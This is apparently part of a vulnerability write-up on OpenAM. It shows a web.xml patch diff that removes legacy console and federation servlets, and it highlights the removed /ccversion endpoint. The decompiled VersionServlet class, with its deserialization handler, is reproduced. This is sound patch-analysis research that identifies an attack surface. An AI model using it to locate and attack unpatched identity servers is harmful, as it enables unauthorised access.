+        	<param-value>/serverinfo/*,/serverinfo/version,/serverinfo/cookieDomains</param-value>
+    	</init-param>
+	</filter>
 	<filter>
     	<filter-name>CacheForFiveMinutes</filter-name>
     	<filter-class>org.forgerock.openam.headers.SetHeadersFilter</filter-class>
@@ -210,73 +150,9 @@
     	</init-param>
     	<init-param>
         	<param-name>excludes</param-name>
-        	<param-value>/policyEditor/,/policyEditor/index.html,/scripts/,/scripts/index.html,/XUI/,/XUI/index.html</param-value>
+        	<param-value>/XUI/,/XUI/index.html,/ui-admin/,/ui-admin/index.html</param-value>
     	</init-param>
 	</filter>
-	<!-- To configure CORS Support, please see the documentation and use the following lines as a template.
-	<filter>
-    	<filter-name>CORSFilter</filter-name>
-    	<filter-class>org.forgerock.openam.cors.CORSFilter</filter-class>
-    	<init-param>
-        	<description>
-            	Accepted Methods (Required):
-            	A comma separated list of HTTP methods for which to accept CORS requests.
-        	</description>
-        	<param-name>methods</param-name>
-        	<param-value>POST,PUT</param-value>
-    	</init-param>
-    	<init-param>
-        	<description>
-            	Accepted Origins (Required):
-            	A comma separated list of origins from which to accept CORS requests.
-        	</description>
-        	<param-name>origins</param-name>
-        	<param-value>http://www.example.net,https://example.org:8433</param-value>
-    	</init-param>
-    	<init-param>
-        	<description>
-            	Allow Credentials (Optional):
-            	Whether to include the Vary (Origin) and Access-Control-Allow-Credentials headers in the response.
-            	Default: false
-        	</description>
-        	<param-name>allowCredentials</param-name>
-        	<param-value>false</param-value>
-    	</init-param>
-    	<init-param>
-        	<description>
-            	Allowed Headers (Optional):
-            	A comma separated list of HTTP headers which can be included in the requests.
-        	</description>
-        	<param-name>headers</param-name>
-        	<param-value>headerOne,headerTwo,headerThree</param-value>
-    	</init-param>
-    	<init-param>
-        	<description>
-            	Expected Hostname (Optional):
-            	The name of the host expected in the request Host header.
-        	</description>
-        	<param-name>expectedHostname</param-name>
-        	<param-value>openam.example.com:8080</param-value>
-    	</init-param>
-    	<init-param>
-        	<description>
-            	Exposed Headers (Optional):
-            	The comma separated list of headers which the user-agent can expose to its CORS client.
-        	</description>
-        	<param-name>exposeHeaders</param-name>
-        	<param-value>exposeHeaderOne,exposeHeaderTwo</param-value>
-    	</init-param>
-    	<init-param>
-        	<description>
-            	Maximum Cache Age (Optional):
-            	The maximum time that the CORS client can cache the pre-flight response, in seconds.
-            	Default: 600
-        	</description>
-        	<param-name>maxAge</param-name>
-        	<param-value>600</param-value>
-    	</init-param>
-	</filter>
-	-->
 	<filter>
     	<filter-name>AuditContextFilter</filter-name>
     	<filter-class>org.forgerock.openam.audit.context.AuditContextFilter</filter-class>
@@ -308,9 +184,9 @@
     	<url-pattern>/*</url-pattern>
 	</filter-mapping>

-	<!-- Access audit filter for JATO, Debug.jsp and ssoadm.jsp pages -->
+	<!-- Access audit filter for Debug.jsp and ssoadm.jsp pages -->
 	<filter>
-    	<filter-name>JatoAuditFilter</filter-name>
+    	<filter-name>DebugAuditFilter</filter-name>
     	<filter-class>org.forgerock.openam.audit.servlet.AuditAccessServletFilter</filter-class>
     	<init-param>
         	<param-name>auditing-component</param-name>
@@ -318,36 +194,12 @@
     	</init-param>
 	</filter>
 	<filter-mapping>
-    	<filter-name>JatoAuditFilter</filter-name>
-    	<url-pattern>/service/*</url-pattern>
-	</filter-mapping>
-	<filter-mapping>
-    	<filter-name>JatoAuditFilter</filter-name>
-    	<url-pattern>/federation/*</url-pattern>
-	</filter-mapping>
-	<filter-mapping>
-    	<filter-name>JatoAuditFilter</filter-name>
-    	<url-pattern>/realm/*</url-pattern>
-	</filter-mapping>
-	<filter-mapping>
-    	<filter-name>JatoAuditFilter</filter-name>
-    	<url-pattern>/agentconfig/*</url-pattern>
-	</filter-mapping>
-	<filter-mapping>
-    	<filter-name>JatoAuditFilter</filter-name>
-    	<url-pattern>/sts/*</url-pattern>
-	</filter-mapping>
-	<filter-mapping>
-    	<filter-name>JatoAuditFilter</filter-name>
-    	<url-pattern>/delegation/*</url-pattern>
+    	<filter-name>DebugAuditFilter</filter-name>
+    	<url-pattern>/Debug.jsp</url-pattern>
 	</filter-mapping>
 	<filter-mapping>
-    	<filter-name>JatoAuditFilter</filter-name>
-    	<url-pattern>/idm/*</url-pattern>
-	</filter-mapping>
-	<filter-mapping>
-    	<filter-name>JatoAuditFilter</filter-name>
-    	<url-pattern>/Debug.jsp</url-pattern>
+    	<filter-name>DebugAuditFilter</filter-name>
+    	<url-pattern>/Logback.jsp</url-pattern>
 	</filter-mapping>
 	<filter>
     	<filter-name>SsoAdmJspAuditFilter</filter-name>
@@ -366,15 +218,13 @@
     	<filter-name>amSetupFilter</filter-name>
     	<url-pattern>/*</url-pattern>
 	</filter-mapping>
-	<!--
 	<filter-mapping>
-    	<filter-name>CORSFilter</filter-name>
-    	<url-pattern>/json/*</url-pattern>
+    	<filter-name>FQDNValidationFilter</filter-name>
+    	<url-pattern>/XUI/*</url-pattern>
 	</filter-mapping>
-	-->
 	<filter-mapping>
     	<filter-name>FQDNValidationFilter</filter-name>
-    	<url-pattern>/XUI/*</url-pattern>
+    	<url-pattern>/ui-admin/*</url-pattern>
 	</filter-mapping>
 	<filter-mapping>
     	<filter-name>FQDNValidationFilter</filter-name>
@@ -402,14 +252,23 @@
     	<filter-name>NoSniffFilter</filter-name>
     	<url-pattern>/*</url-pattern>
 	</filter-mapping>
+	<filter-mapping>
+    	<filter-name>CachePrivate</filter-name>
+    	<url-pattern>/json/*</url-pattern>
+	</filter-mapping>
 	<filter-mapping>
     	<filter-name>ResponseValidationFilter</filter-name>
     	<url-pattern>/*</url-pattern>
 	</filter-mapping>
 	<filter-mapping>
+    	<!-- The DisableSameSiteCookiesFilter should always come before the SecureCookieFilter -->
     	<filter-name>DisableSameSiteCookiesFilter</filter-name>
     	<url-pattern>/*</url-pattern>
 	</filter-mapping>
+	<filter-mapping>
+    	<filter-name>SecureCookieFilter</filter-name>
+    	<url-pattern>/*</url-pattern>
+	</filter-mapping>
 	<filter-mapping>
     	<filter-name>CacheForFiveMinutes</filter-name>
     	<url-pattern>/XUI/index.html</url-pattern>
@@ -420,6 +279,10 @@
     	<url-pattern>/ui-admin/*</url-pattern>
     	<url-pattern>/XUI/*</url-pattern>
 	</filter-mapping>
+	<filter-mapping>
+    	<filter-name>CacheForFiveMinutes</filter-name>
+    	<url-pattern>/ui-admin/index.html</url-pattern>
+	</filter-mapping>
 	<filter-mapping>
     	<filter-name>NotificationsWebSocketFilter</filter-name>
     	<url-pattern>/notifications</url-pattern>
@@ -445,10 +308,6 @@

 	<!-- listener declaration -->

-	<servlet>
-    	<servlet-name>LoginServlet</servlet-name>
-    	<servlet-class>com.sun.identity.authentication.UI.LoginServlet</servlet-class>
-	</servlet>
 	<servlet>
     	<servlet-name>setSetupProgress</servlet-name>
     	<servlet-class>com.sun.identity.setup.SetSetupProgress</servlet-class>
@@ -528,121 +387,6 @@
     	<servlet-class>com.sun.identity.configuration.MonitoringFedConfigurator</servlet-class>
     	<load-on-startup>30</load-on-startup>
 	</servlet>
-	<servlet>
-    	<description>CDCServlet</description>
-    	<servlet-name>cdcservlet</servlet-name>
-    	<servlet-class>com.iplanet.services.cdc.CDCServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<description>SAMLAwareServlet</description>
-    	<servlet-name>SAMLAwareServlet</servlet-name>
-    	<servlet-class>com.sun.identity.saml.servlet.SAMLAwareServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<description>SAMLPOSTProfileServlet</description>
-    	<servlet-name>SAMLPOSTProfileServlet</servlet-name>
-    	<servlet-class>com.sun.identity.saml.servlet.SAMLPOSTProfileServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<description>SAMLSOAPReceiver</description>
-    	<servlet-name>SAMLSOAPReceiver</servlet-name>
-    	<servlet-class>com.sun.identity.saml.servlet.SAMLSOAPReceiver</servlet-class>
-	</servlet>
-	<servlet>
-    	<description>AssertionManagerServlet</description>
-    	<servlet-name>AssertionManagerServlet</servlet-name>
-    	<servlet-class>com.sun.identity.saml.servlet.AssertionManagerServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<description>FSAssertionManagerServlet</description>
-    	<servlet-name>FSAssertionManagerServlet</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.FSAssertionManagerServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<description>SecurityTokenManagerServlet</description>
-    	<servlet-name>SecurityTokenManagerServlet</servlet-name>
-    	<servlet-class>com.sun.identity.liberty.ws.security.SecurityTokenManagerServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>preLoginHandler</servlet-name>
-    	<servlet-class>com.sun.identity.federation.login.FSPreLoginHandler</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>postLoginHandler</servlet-name>
-    	<servlet-class>com.sun.identity.federation.login.FSPostLoginHandler</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>ProcessLogout</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.logout.FSProcessLogoutServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>ReturnLogout</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.logout.FSReturnLogoutServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>SingleSignOnService</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.fednsso.FSSSOAndFedService</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>IntersiteTransferService</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.fednsso.FSIntersiteTransferService</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>AssertionConsumerService</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.fednsso.FSAssertionConsumerService</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>SOAPReceiver</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.FSSOAPReceiver</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>FederationTerminationServlet</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.termination.FSTerminationInitiationServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>ProcessTermination</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.termination.FSTerminationRequestServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>ReturnTermination</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.termination.FSTerminationReturnServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>InitiateRegistration</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.registration.FSRegistrationInitiationServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>ProcessRegistration</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.registration.FSRegistrationRequestServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>ReturnRegistration</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.registration.FSRegistrationReturnServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>LogoutServlet</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.logout.FSSingleLogoutServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>WSSOAPReceiver</servlet-name>
-    	<servlet-class>com.sun.identity.liberty.ws.soapbinding.SOAPReceiver</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>WSPRedirectHandler</servlet-name>
-    	<servlet-class>com.sun.identity.liberty.ws.interaction.WSPRedirectHandlerServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>IDPFinderService</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.fednsso.FSIDPFinderService</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>idffwriter</servlet-name>
-    	<servlet-class>com.sun.identity.saml2.idpdiscovery.CookieWriterServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>idffreader</servlet-name>
-    	<servlet-class>com.sun.identity.saml2.idpdiscovery.CookieReaderServlet</servlet-class>
-	</servlet>
 	<servlet>
     	<servlet-name>saml2writer</servlet-name>
     	<servlet-class>com.sun.identity.saml2.idpdiscovery.CookieWriterServlet</servlet-class>
@@ -814,10 +558,6 @@
     	<servlet-name>LoginLogoutMapping</servlet-name>
     	<url-pattern>/logout</url-pattern>
 	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>LoginServlet</servlet-name>
-    	<url-pattern>/UI/*</url-pattern>
-	</servlet-mapping>
 	<servlet-mapping>
     	<servlet-name>AMSetupServlet</servlet-name>
     	<url-pattern>/config/configurator</url-pattern>
@@ -1025,114 +765,6 @@
     	<servlet-name>spsaehandler</servlet-name>
     	<url-pattern>/spsaehandler/*</url-pattern>
 	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>IDPFinderService</servlet-name>
-    	<url-pattern>/idpfinder</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>cdcservlet</servlet-name>
-    	<url-pattern>/cdcservlet</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>SAMLAwareServlet</servlet-name>
-    	<url-pattern>/SAMLAwareServlet</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>SAMLPOSTProfileServlet</servlet-name>
-    	<url-pattern>/SAMLPOSTProfileServlet</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>SAMLSOAPReceiver</servlet-name>
-    	<url-pattern>/SAMLSOAPReceiver</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>AssertionManagerServlet</servlet-name>
-    	<url-pattern>/AssertionManagerServlet/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>FSAssertionManagerServlet</servlet-name>
-    	<url-pattern>/FSAssertionManagerServlet/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>SecurityTokenManagerServlet</servlet-name>
-    	<url-pattern>/SecurityTokenManagerServlet/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>preLoginHandler</servlet-name>
-    	<url-pattern>/preLogin</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>postLoginHandler</servlet-name>
-    	<url-pattern>/postLogin/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>ProcessLogout</servlet-name>
-    	<url-pattern>/ProcessLogout/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>ReturnLogout</servlet-name>
-    	<url-pattern>/ReturnLogout/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>LogoutServlet</servlet-name>
-    	<url-pattern>/liberty-logout</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>SingleSignOnService</servlet-name>
-    	<url-pattern>/SingleSignOnService/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>IntersiteTransferService</servlet-name>
-    	<url-pattern>/IntersiteTransferService</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>AssertionConsumerService</servlet-name>
-    	<url-pattern>/AssertionConsumerService/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>SOAPReceiver</servlet-name>
-    	<url-pattern>/SOAPReceiver/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>FederationTerminationServlet</servlet-name>
-    	<url-pattern>/federation-terminate</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>ProcessTermination</servlet-name>
-    	<url-pattern>/ProcessTermination/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>ReturnTermination</servlet-name>
-    	<url-pattern>/ReturnTermination/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>InitiateRegistration</servlet-name>
-    	<url-pattern>/InitiateRegistration</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>ProcessRegistration</servlet-name>
-    	<url-pattern>/ProcessRegistration/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>ReturnRegistration</servlet-name>
-    	<url-pattern>/ReturnRegistration/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>WSSOAPReceiver</servlet-name>
-    	<url-pattern>/Liberty/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>WSPRedirectHandler</servlet-name>
-    	<url-pattern>/WSPRedirectHandler/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>idffwriter</servlet-name>
-    	<url-pattern>/idffwriter</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>idffreader</servlet-name>
-    	<url-pattern>/idffreader</url-pattern>
-	</servlet-mapping>
 	<servlet-mapping>
     	<servlet-name>saml2writer</servlet-name>
     	<url-pattern>/saml2writer</url-pattern>
@@ -1164,30 +796,6 @@

 	<!-- end of servlet mapping -->

-	<servlet>
-    	<servlet-name>WebFinger</servlet-name>
-    	<servlet-class>org.restlet.ext.servlet.ServerServlet</servlet-class>
-
-    	<!-- Your application class name (Optional - For mode 3) -->
-    	<init-param>
-        	<param-name>org.restlet.application</param-name>
-        	<param-value>org.forgerock.openidconnect.restlet.WebFinger</param-value>
-    	</init-param>
-
-    	<!-- List of supported client protocols (Optional - Only in mode 3) -->
-    	<init-param>
-        	<param-name>org.restlet.clients</param-name>
-        	<param-value>RIAP CLAP</param-value>
-    	</init-param>
-
-    	<!-- Add the Servlet context path to routes (Optional) -->
-    	<init-param>
-        	<param-name>org.restlet.autoWire</param-name>
-        	<param-value>true</param-value>
-    	</init-param>
-
-	</servlet>
-
 	<servlet>
     	<servlet-name>OAuth2RegisterClient</servlet-name>
     	<jsp-file>/oauth2/registerClient.jsp</jsp-file>
@@ -1200,14 +808,9 @@

 	<!-- servlet declaration -->

-	<servlet-mapping>
-    	<servlet-name>WebFinger</servlet-name>
-    	<url-pattern>/.well-known/*</url-pattern>
-	</servlet-mapping>
-
 	<servlet>
     	<servlet-name>OpenAM</servlet-name>
-    	<servlet-class>org.forgerock.http.servlet.HttpFrameworkServlet</servlet-class>
+    	<servlet-class>org.forgerock.openam.http.OpenAMHttpFrameworkServlet</servlet-class>
     	<init-param>
         	<param-name>application-loader</param-name>
         	<param-value>guice</param-value>
@@ -1238,90 +841,22 @@
     	<servlet-name>OpenAM</servlet-name>
     	<url-pattern>/sts-tokengen/*</url-pattern>
 	</servlet-mapping>
-
-	<!-- Console -->
-	<servlet-mapping>
-    	<servlet-name>AuthServlet</servlet-name>
-    	<url-pattern>/authentication/*</url-pattern>
-	</servlet-mapping>
 	<servlet-mapping>
-    	<servlet-name>AMBaseServlet</servlet-name>
-    	<url-pattern>/base/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>SCServlet</servlet-name>
-    	<url-pattern>/service/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>SMServlet</servlet-name>
-    	<url-pattern>/session/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>RMServlet</servlet-name>
-    	<url-pattern>/realm/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>PMServlet</servlet-name>
-    	<url-pattern>/policy/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>IDMServlet</servlet-name>
-    	<url-pattern>/idm/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>UMServlet</servlet-name>
-    	<url-pattern>/user/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>DelegationServlet</servlet-name>
-    	<url-pattern>/delegation/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>TaskServlet</servlet-name>
-    	<url-pattern>/task/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>AgentConfigurationServlet</servlet-name>
-    	<url-pattern>/agentconfig/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>VersionServlet</servlet-name>
-    	<url-pattern>/ccversion/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>FSServlet</servlet-name>
-    	<url-pattern>/federation/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>WSServlet</servlet-name>
-    	<url-pattern>/webservices/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>STSServlet</servlet-name>
-    	<url-pattern>/sts/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>AuditServlet</servlet-name>
-    	<url-pattern>/audit/*</url-pattern>
-	</servlet-mapping>
-	<!-- End console -->
-
-	<servlet>
-    	<servlet-name>ForgeRockRest</servlet-name>
-    	<servlet-class>org.forgerock.openam.rest.RestEndpointServlet</servlet-class>
-	</servlet>
-	<servlet-mapping>
-    	<servlet-name>ForgeRockRest</servlet-name>
+    	<servlet-name>OpenAM</servlet-name>
     	<url-pattern>/xacml/*</url-pattern>
 	</servlet-mapping>
 	<servlet-mapping>
-    	<servlet-name>ForgeRockRest</servlet-name>
+    	<servlet-name>OpenAM</servlet-name>
     	<url-pattern>/oauth2/*</url-pattern>
 	</servlet-mapping>
 	<servlet-mapping>
-    	<servlet-name>ForgeRockRest</servlet-name>
+    	<servlet-name>OpenAM</servlet-name>
     	<url-pattern>/uma/*</url-pattern>
 	</servlet-mapping>
+	<servlet-mapping>
+    	<servlet-name>OpenAM</servlet-name>
+    	<url-pattern>/.well-known/*</url-pattern>
+	</servlet-mapping>

 	<!-- Setup favicon.ico extension type -->
 	<mime-mapping>
@@ -1335,106 +870,6 @@
     	</welcome-file>
 	</welcome-file-list>

-	<!-- The taglib is only specified once -->
-	<jsp-config>
-    	<taglib>
-        	<taglib-uri>/WEB-INF/jato.tld</taglib-uri>
-        	<taglib-location>/WEB-INF/jato.tld</taglib-location>
-    	</taglib>
-    	<taglib>
-        	<taglib-uri>/WEB-INF/cc.tld</taglib-uri>
-        	<taglib-location>/WEB-INF/com_sun_web_ui/cc.tld</taglib-location>
-    	</taglib>
-
-    	<!-- workarounds for lockart 2.x -->
-    	<taglib>
-        	<taglib-uri>/WEB-INF/tld/com_iplanet_jato/jato.tld</taglib-uri>
-        	<taglib-location>/WEB-INF/jato.tld</taglib-location>
-    	</taglib>
-    	<taglib>
-        	<taglib-uri>/WEB-INF/tld/com_sun_web_ui/cc.tld</taglib-uri>
-        	<taglib-location>/WEB-INF/com_sun_web_ui/cc.tld</taglib-location>
-    	</taglib>
-    	<!-- taglib definition -->
-	</jsp-config>
-	<!-- comment it out due to issue 4891 in WAS/JBOSS/Geronimo
-	<resource-ref>
-    	<description>mysql db idrepo</description>
-    	<res-ref-name>jdbc/openssousersdb</res-ref-name>
-    	<res-type>javax.sql.DataSource</res-type>
-    	<res-auth>Container</res-auth>
-    	<res-sharing-scope>Shareable</res-sharing-scope>
-	</resource-ref>
-	-->
-
-	<!-- Console -->
-	<servlet>
-    	<servlet-name>UMServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.user.UMServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>AuthServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.authentication.AuthServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>AMBaseServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.base.AMBaseServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>SCServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.service.SCServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>SMServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.session.SMServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>RMServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.realm.RMServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>PMServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.policy.PMServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>IDMServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.idm.IDMServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>DelegationServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.delegation.DelegationServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>AgentConfigurationServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.agentconfig.AgentConfigurationServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>TaskServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.task.TaskServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>VersionServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.version.VersionServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>FSServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.federation.FSServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>WSServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.webservices.WSServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>STSServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.sts.STSServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>AuditServlet</servlet-name>
-    	<servlet-class>com.sun.identity.console.audit.AuditServlet</servlet-class>
-	</servlet>
-
-	<!-- End console -->
-
 	<!-- Start errors -->
 	<error-page>
     	<error-code>404</error-code>

The ccversion endpoint was notably removed:

-	<servlet-mapping>
-    	<servlet-name>VersionServlet</servlet-name>
-    	<url-pattern>/ccversion/*</url-pattern>
-	</servlet-mapping>

The original VersionServlet can be seen here:

package WEB-INF.classes.com.sun.identity.console.version;

import com.iplanet.jato.CompleteRequestException;
import com.iplanet.jato.RequestContext;
import com.iplanet.jato.RequestContextImpl;
import com.iplanet.jato.ViewBeanManager;
import com.iplanet.jato.view.ViewBean;
import com.sun.identity.console.base.AMViewBeanBase;
import com.sun.identity.console.version.VersionViewBean;
import com.sun.web.ui.servlet.version.VersionServlet;
import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;





























public class VersionServlet
  extends VersionServlet
{
  protected void initializeRequestContext(RequestContext requestContext) {
    super.initializeRequestContext(requestContext);



    ViewBeanManager viewBeanManager = new ViewBeanManager(requestContext, getPackageName(com.sun.identity.console.version.VersionServlet.class.getName()));
    ((RequestContextImpl)requestContext).setViewBeanManager(viewBeanManager);
  }





  protected void onRequestHandlerNotFound(RequestContext requestContext, String handlerName) throws ServletException {
    AMViewBeanBase.debug.error("VersionServlet.onRequestHandlerNotFound: " + handlerName);
  }




  protected void onRequestHandlerNotSpecified(RequestContext requestContext) throws ServletException {
    AMViewBeanBase.debug.error("VersionServlet.onRequestHandlerNotSpecified");
  }





  protected void onUncaughtException(RequestContext requestContext, Exception e) throws ServletException, IOException {
    HttpServletRequest httpRequest = requestContext.getRequest();
    AMViewBeanBase.debug.error("VersionServlet.onUncaughtException", e);
    String redirectUrl = VersionViewBean.getCurrentURL(httpRequest) + "/base/AMUncaughtException";

    requestContext.getResponse().sendRedirect(redirectUrl);
  }






  protected void onPageSessionDeserializationException(RequestContext requestContext, ViewBean viewBean, Exception e) throws ServletException, IOException {
    HttpServletRequest httpRequest = requestContext.getRequest();
    AMViewBeanBase.debug.error("VersionServlet.onUncaughtException", e);
    String redirectUrl = VersionViewBean.getCurrentURL(httpRequest) + "/base/AMInvalidURL";

    requestContext.getResponse().sendRedirect(redirectUrl);
    throw new CompleteRequestException();
  }

  protected void onSessionTimeout(RequestContext requestContext) throws ServletException {}
}

More details can be found in the PortSwigger writeup.